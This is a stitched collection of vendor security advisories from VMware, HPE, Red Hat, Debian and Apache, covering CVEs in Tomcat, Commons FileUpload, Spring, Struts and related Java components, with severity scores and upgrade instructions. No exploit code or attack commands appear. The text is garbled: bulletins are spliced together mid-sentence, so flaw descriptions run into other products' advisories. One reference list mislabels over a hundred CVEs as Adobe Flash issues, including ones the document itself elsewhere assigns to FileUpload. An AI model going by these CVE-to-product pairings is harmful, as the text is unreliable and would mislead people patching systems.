in conjunction with the release of vSphere\n   5.5 Update 2 on 2014-09-09. Contact\n\n   E-mail list for product security notifications and announcements:\n   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\n   This Security Advisory is posted to the following lists:\n\n    security-announce at lists.vmware.com\n    bugtraq at securityfocus.com\n    fulldisclosure at seclists.org\n\n   E-mail: security at vmware.com\n   PGP key at: http://kb.vmware.com/kb/1055\n\n   VMware Security Advisories\n   http://www.vmware.com/security/advisories\n\n   VMware Security Response Policy\n   https://www.vmware.com/support/policies/security_response.html\n\n   VMware Lifecycle Support Phases\n   https://www.vmware.com/support/policies/lifecycle.html\n \n   Twitter\n   https://twitter.com/VMwareSRC\n\n   Copyright 2014 VMware Inc.  All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05324755\nVersion: 1\n\nHPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote\nDenial of Service, Arbitrary Code Execution and Cross-Site Request Forgery\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-11-04\nLast Updated: 2016-11-04\n\nPotential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary\nCode Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in HPE SiteScope. The\nvulnerabilities could be exploited to allow local elevation of privilege and\nexploited remotely to allow denial of service, arbitrary code execution,\ncross-site request forgery. \n\nReferences:\n\n  - CVE-2014-0114 - Apache Struts, execution of arbitrary code\n  - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)\n  - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions \n  - CVE-2015-3253 - Apache Groovy, execution of arbitrary code \n  - CVE-2015-5652 - Python, elevation of privilege\n  - CVE-2013-6429 - Spring Framework, cross-site request forgery\n  - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)\n  - PSRT110264\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - HP SiteScope Monitors Software Series 11.2xa11.32IP1\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2013-6429\n      6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L\n      6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n    CVE-2014-0050\n      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2014-0107\n      8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2014-0114\n      6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2015-3253\n      7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2015-5652\n      8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n      7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)\n\n    CVE-2016-0763\n      6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L\n      6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided a resolution via an update to HPE SiteScope. Details on the\nupdate and each vulnerability are in the KM articles below. \n\n  **Note:** The resolution for each vulnerability listed is to upgrade to\nSiteScope 11.32IP2 or an even more recent version of SiteScope if available. \nThe SiteScope update can be can found in the personal zone in \"my updates\" in\nHPE Software Support Online: \u003chttps://softwaresupport.hpe.com\u003e. \n\n\n  * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): \n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02550251\u003e\n\n\n  * Apache Struts: KM02553983 (CVE-2014-0114):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553983\u003e\n\n\n  * Apache Tomcat: KM02553990 (CVE-2016-0763):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553990\u003e\n\n  * Apache XML Xalan: KM02553991 (CVE-2014-0107):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553991\u003e\n\n  * Apache Groovy: KM02553992 (CVE-2015-3253):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553992\u003e\n\n  * Python: KM02553997 (CVE-2015-5652):\n\n    *\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553997\u003e\n\n  * Spring Framework: KM02553998 (CVE-2013-6429):\n\n    +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553998\u003e\n\nHISTORY\nVersion:1 (rev.1) - 4 November 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \nFuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications. \n\nThis release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update\nto Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files. \n\nThe following security issues are also addressed with this release:\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. (CVE-2014-0003)\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. (CVE-2013-6440)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. By repeatedly sending a request \n    for an authenticated resource while the victim is completing the login \n    form, an attacker could inject a request that would be executed using the \n    victim\u0027s credentials. \n\nCVE-2013-2071\n\n    A runtime exception in AsyncListener.onComplete() prevents the request from \n    being recycled. This may expose elements of a previous request to a current \n    request. \n\nCVE-2013-4322\n\n    When processing a request submitted using the chunked transfer encoding, \n    Tomcat ignored but did not limit any extensions that were included. by streaming an unlimited amount \n    of data to the server. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 7.0.28-4+deb7u1. \n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 7.0.52-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7.0.52-1. \n\nWe recommend that you upgrade your tomcat7 packages. This issue was \n      found to be only partially addressed in CVE-2014-0094. \n\n      CVE-2014-0050 may lead to a denial of service condition. \n\n      vCenter Operations Management Suite (vCOps) is affected by both \n      CVE-2014-0112 and CVE-2014-0050. \n\n      vCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not \n      by CVE-2014-0112. \n\n      Workaround\n\n      A workaround for CVE-2014-0112 is documented in VMware Knowledge Base\n      article 2081470. While Tomcat 6 uses Commons FileUpload as part of the Manager\napplication, access to that functionality is limited to authenticated\nadministrators. \nThis issue was reported responsibly to the Apache Software Foundation\nvia JPCERT but an error in addressing an e-mail led to the unintended\nearly disclosure of this issue[1]. \n\nMitigation:\nUsers of affected versions should apply one of the following mitigations\n- - Upgrade to Apache Commons FileUpload 1.3.1 or later once released\n- - Upgrade to Apache Tomcat 8.0.2 or later once released\n- - Upgrade to Apache Tomcat 7.0.51 or later once released\n- - Apply the appropriate patch\n  - Commons FileUpload: http://svn.apache.org/r1565143\n  - Tomcat 8: http://svn.apache.org/r1565163\n  - Tomcat 7: http://svn.apache.org/r1565169\n- - Limit the size of the Content-Type header to less than 4091 bytes\n\nCredit:\nThis issue was reported to the Apache Software Foundation via JPCERT. \n \n Additionally a build problem with maven was discovered, fixed maven\n packages is also being provided with this advisory. \n\nReferences:\n\n  - CVE-2009-5028 - Namazu Remote Denial of Service\n  - CVE-2011-4345 - Namazu Cross-site Scripting\n  - CVE-2014-0050 - Apache Commons Collection Unauthorized Disclosure of\nInformation\n  - CVE-2014-4877 - GNU Wget, Unauthorized Disclosure of Information\n  - CVE-2015-5125 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5127 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5129 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5130 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5131 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5132 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5133 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5134 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5539 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5540 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5541 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5544 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5545 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5546 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5547 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5548 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5549 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5550 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5551 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5552 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5553 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5554 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5555 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5556 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5557 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5558 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5559 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5560 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5561 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5562 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5563 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5564 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5565 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5566 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5567 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5568 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5570 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5571 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5572 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5573 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5574 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5575 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5576 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5577 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5578 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5579 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5580 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5581 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5582 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5584 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5587 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-5588 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6420 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6676 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6677 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6678 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6679 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-6682 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-7547 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8044 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8415 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8416 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8417 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8418 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8419 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8420 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8421 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8422 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8423 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8424 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8425 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8426 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8427 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8428 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8429 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8430 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8431 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8432 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8433 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8434 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8435 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8436 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8437 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8438 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8439 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8440 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8441 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8442 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8443 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8444 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8445 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8446 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8447 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8448 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8449 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8450 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8451 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8452 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8453 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8454 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8455 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8456 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8457 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8459 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8460 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8634 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8635 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8636 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8638 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8639 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8640 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8641 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8642 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8643 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8644 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8645 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8646 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8647 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8648 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8649 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8650 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8651 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0702 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0705 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0777 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0778 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0797 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0799 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-1521 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-1907 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2105 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2106 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2107 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2109 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2183 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2842 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-3739 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4070 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4071 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4072 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4342 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4343 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4393 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4394 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4395 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4396 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4537 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4538 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4539 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4540 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4541 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4542 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4543 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-5385 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-5387 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-5388 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2017-5787 - DoS - LINUX VCRM\n  - CVE-2016-8517 - SIM\n  - CVE-2016-8516 - SIM\n  - CVE-2016-8518 - SIM\n  - CVE-2016-8513 - Cross-Site Request Forgery (CSRF) Linux VCRM\n  - CVE-2016-8515 - Malicious File Upload - Linux VCRM\n  - CVE-2016-8514 - Information Disclosure - Linux VCRM\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nIt was found that previous fixes in Tomcat 6 to path parameter handling\nintroduced a regression that caused Tomcat to not properly disable URL\nrewriting to track session IDs when the disableURLRewriting option was\nenabled. A man-in-the-middle attacker could potentially use this flaw to\nhijack a user\u0027s session. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied, and back up your existing Red\nHat JBoss Web Server installation (including all applications and\nconfiguration files). Bugs fixed (https://bugzilla.redhat.com/):\n\n1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream\n1069905 - CVE-2013-4322 tomcat: incomplete fix for CVE-2012-3544\n1069919 - CVE-2014-0033 tomcat: session fixation still possible with disableURLRewriting enabled\n1069921 - CVE-2013-4286 tomcat: multiple content-length header poisoning flaws\n\n6.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: Red Hat JBoss Fuse 6.1.0 update\nAdvisory ID:       RHSA-2014:0400-03\nProduct:           Red Hat JBoss Fuse\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-0400.html\nIssue date:        2014-04-14\nCVE Names:         CVE-2013-2035 CVE-2013-2172 CVE-2013-2192 \n                   CVE-2013-4152 CVE-2013-4517 CVE-2013-6429 \n                   CVE-2013-6430 CVE-2014-0050 CVE-2014-0054 \n                   CVE-2014-0085 CVE-2014-1904 \n=====================================================================\n\n1. Summary:\n\nRed Hat JBoss Fuse 6.1.0, which fixes multiple security issues, several\nbugs, and adds various enhancements, is now available from the Red Hat\nCustomer Portal. \n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\nRed Hat JBoss Fuse 6.1.0 is a minor product release that updates Red Hat\nJBoss Fuse 6.0.0, and includes several bug fixes and enhancements. Refer to\nthe Release Notes document, available from the link in the References\nsection, for a list of changes. \n\n2. Description:\n\nRed Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,\nflexible, open source enterprise service bus and integration platform. \n\nSecurity fixes:\n\nA flaw was found in the way Apache Santuario XML Security for Java\nvalidated XML signatures. Santuario allowed a signature to specify an\narbitrary canonicalization algorithm, which would be applied to the\nSignedInfo XML fragment. A remote attacker could exploit this to spoof an\nXML signature via a specially crafted XML signature block. (CVE-2013-2172)\n\nA flaw was found in the Apache Hadoop RPC protocol. A man-in-the-middle\nattacker could possibly use this flaw to unilaterally disable bidirectional\nauthentication between a client and a server, forcing a downgrade to simple\n(unidirectional) authentication. This flaw only affected users who have\nenabled Hadoop\u0027s Kerberos security features. (CVE-2013-2192)\n\nIt was discovered that the Spring OXM wrapper did not expose any property\nfor disabling entity resolution when using the JAXB unmarshaller. A remote\nattacker could use this flaw to conduct XML External Entity (XXE) attacks\non web sites, and read files in the context of the user running the\napplication server. (CVE-2013-4152)\n\nIt was discovered that the Apache Santuario XML Security for Java project\nallowed Document Type Definitions (DTDs) to be processed when applying\nTransforms even when secure validation was enabled. A remote attacker could\nuse this flaw to exhaust all available memory on the system, causing a\ndenial of service. (CVE-2013-4517)\n\nIt was found that the Spring MVC SourceHttpMessageConverter enabled entity\nresolution by default. A remote attacker could use this flaw to conduct XXE\nattacks on web sites, and read files in the context of the user running the\napplication server. (CVE-2013-6429)\n\nThe Spring JavaScript escape method insufficiently escaped some characters. \nApplications using this method to escape user-supplied content, which would\nbe rendered in HTML5 documents, could be exposed to cross-site scripting\n(XSS) flaws. (CVE-2013-6430)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. (CVE-2014-0050)\n\nIt was found that fixes for the CVE-2013-4152 and CVE-2013-6429 XXE issues\nin Spring were incomplete. Spring MVC processed user-provided XML and\nneither disabled XML external entities nor provided an option to disable\nthem, possibly allowing a remote attacker to conduct XXE attacks. \n(CVE-2014-0054)\n\nA cross-site scripting (XSS) flaw was found in the Spring Framework when\nusing Spring MVC. When the action was not specified in a Spring form, the\naction field would be populated with the requested URI, allowing an\nattacker to inject malicious content into the form. (CVE-2014-1904)\n\nThe HawtJNI Library class wrote native libraries to a predictable file name\nin /tmp when the native libraries were bundled in a JAR file, and no custom\nlibrary path was specified. A local attacker could overwrite these native\nlibraries with malicious versions during the window between when HawtJNI\nwrites them and when they are executed. (CVE-2013-2035)\n\nAn information disclosure flaw was found in the way Apache Zookeeper stored\nthe password of an administrative user in the log files. A local user with\naccess to these log files could use the exposed sensitive information to\ngain administrative access to an application using Apache Zookeeper. \n(CVE-2014-0085)\n\nThe CVE-2013-6430 issue was discovered by Jon Passki of Coverity SRL and\nArun Neelicattu of the Red Hat Security Response Team, the CVE-2013-2035\nissue was discovered by Florian Weimer of the Red Hat Product Security\nTeam, and the CVE-2014-0085 issue was discovered by Graeme Colman of\nRed Hat. \n\n3. Solution:\n\nAll users of Red Hat JBoss Fuse 6.0.0 as provided from the Red Hat Customer\nPortal are advised to apply this update. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n958618 - CVE-2013-2035 HawtJNI: predictable temporary file name leading to local arbitrary code execution\n999263 - CVE-2013-2172 Apache Santuario XML Security for Java: XML signature spoofing\n1000186 - CVE-2013-4152 Spring Framework: XML External Entity (XXE) injection flaw\n1001326 - CVE-2013-2192 hadoop: man-in-the-middle vulnerability\n1039783 - CVE-2013-6430 Spring Framework: org.spring.web.util.JavaScriptUtils.javaScriptEscape insufficient escaping of characters\n1045257 - CVE-2013-4517 Apache Santuario XML Security for Java: Java XML Signature DoS Attack\n1053290 - CVE-2013-6429 Spring Framework: XML External Entity (XXE) injection flaw\n1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream\n1067265 - CVE-2014-0085 Apache Zookeeper: admin user cleartext password appears in logging\n1075296 - CVE-2014-1904 Spring Framework: cross-site scripting flaw when using Spring MVC\n1075328 - CVE-2014-0054 Spring Framework: incomplete fix for CVE-2013-4152/CVE-2013-6429\n\n5. 